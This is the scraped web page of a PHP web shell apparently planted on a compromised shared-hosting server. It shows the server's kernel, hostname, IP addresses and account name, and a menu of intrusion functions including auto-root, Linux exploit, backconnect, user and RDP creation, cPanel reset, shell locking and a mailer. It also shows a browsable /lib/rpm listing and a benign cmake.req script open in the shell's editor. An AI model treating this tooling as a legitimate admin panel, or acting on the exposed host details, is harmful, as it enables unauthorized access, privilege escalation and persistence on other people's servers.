Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.140
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
fileattrs
[ DIR ]
drwxr-xr-x
lua
[ DIR ]
drwxr-xr-x
macros.d
[ DIR ]
drwxr-xr-x
platform
[ DIR ]
drwxr-xr-x
redhat
[ DIR ]
drwxr-xr-x
alt-nodejs18-fixdep
3.48
KB
-rwxr-xr-x
alt-nodejs18-provide.sh
70
B
-rwxr-xr-x
alt-nodejs18-require.sh
69
B
-rwxr-xr-x
alt-nodejs18-symlink-deps
5.21
KB
-rwxr-xr-x
alt-nodejs18.prov
1.92
KB
-rwxr-xr-x
alt-nodejs18.req
6.75
KB
-rwxr-xr-x
alt-nodejs18_native.req
40
B
-rwxr-xr-x
alt-nodejs20-fixdep
3.48
KB
-rwxr-xr-x
alt-nodejs20-provide.sh
70
B
-rwxr-xr-x
alt-nodejs20-require.sh
69
B
-rwxr-xr-x
alt-nodejs20-symlink-deps
5.21
KB
-rwxr-xr-x
alt-nodejs20.prov
1.92
KB
-rwxr-xr-x
alt-nodejs20.req
6.75
KB
-rwxr-xr-x
alt-nodejs20_native.req
44
B
-rwxr-xr-x
alt-nodejs22-fixdep
3.48
KB
-rwxr-xr-x
alt-nodejs22-provide.sh
70
B
-rwxr-xr-x
alt-nodejs22-require.sh
69
B
-rwxr-xr-x
alt-nodejs22-symlink-deps
5.21
KB
-rwxr-xr-x
alt-nodejs22.prov
1.92
KB
-rwxr-xr-x
alt-nodejs22.req
6.75
KB
-rwxr-xr-x
alt-nodejs22_native.req
44
B
-rwxr-xr-x
alt-nodejs24-fixdep
3.48
KB
-rwxr-xr-x
alt-nodejs24-provide.sh
70
B
-rwxr-xr-x
alt-nodejs24-require.sh
69
B
-rwxr-xr-x
alt-nodejs24-symlink-deps
5.21
KB
-rwxr-xr-x
alt-nodejs24.prov
1.92
KB
-rwxr-xr-x
alt-nodejs24.req
6.75
KB
-rwxr-xr-x
alt-nodejs24_native.req
43
B
-rwxr-xr-x
brp-boot-efi-times
1.43
KB
-rwxr-xr-x
brp-scl-compress
1.77
KB
-rwxr-xr-x
brp-scl-python-bytecompile
3.04
KB
-rwxr-xr-x
cmake.prov
2.92
KB
-rwxr-xr-x
cmake.req
2.29
KB
-rwxr-xr-x
gstreamer1.prov
950
B
-rwxr-xr-x
macros
43.75
KB
-rw-r--r--
rpm.daily
296
B
-rw-r--r--
rpm.log
61
B
-rw-r--r--
rpm.supp
688
B
-rw-r--r--
rpm2cpio.sh
1.56
KB
-rwxr-xr-x
rpmdb_dump
41
B
-rwxr-xr-x
rpmdb_load
41
B
-rwxr-xr-x
rpmpopt-4.16.1.3
11.83
KB
-rw-r--r--
rpmrc
17.24
KB
-rw-r--r--
scldeps.sh
258
B
-rwxr-xr-x
sysusers.generate-pre.sh
2.22
KB
-rwxr-xr-x
sysusers.prov
605
B
-rwxr-xr-x
tgpg
937
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cmake.req
#!/usr/bin/python3 # -*- coding:utf-8 -*- # # Copyright (C) 2017 Björn Esser <besser82@fedoraproject.org> # # based on cmake.prov, which is # Copyright (C) 2015 Daniel Vrátil <dvratil@redhat.com> # Copyright (C) 2017 Daniel Vrátil <dvratil@fedoraproject.org> # # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Library General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU Library General Public # License along with this program; if not, write to the # Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # import sys import re import subprocess class CMakeParser: def __init__(self, filelist = None): if filelist == None: filelist = sys.stdin has_module = False is_arched = False isa_suf = subprocess.check_output(["/usr/bin/rpm", "-E %{?_isa}"]).decode().strip() paths = map(lambda x: x.rstrip(), filelist.readlines()) for path in paths: modulePath, cmakeModule, lowercase = self.parseCmakeModuleConfig(path) if modulePath and cmakeModule: has_module = True if re.match(".*/usr/lib(64)?/cmake/.*", modulePath): is_arched = True if has_module: if is_arched: print("cmake-filesystem%s" % isa_suf) else: print("cmake-filesystem") def parseCmakeModuleConfig(self, configFile): paths = configFile.rsplit("/", 3) modulePath = "%s/cmake/%s" % (paths[0], paths[2]) cfgFile = paths[3] if cfgFile.endswith("Config.cmake"): return (modulePath, cfgFile[0:-len("Config.cmake")], False) elif cfgFile.endswith("-config.cmake"): return (modulePath, cfgFile[0:-len("-config.cmake")], True) else: return (None, None, False) if __name__ == "__main__": parser = CMakeParser()
Close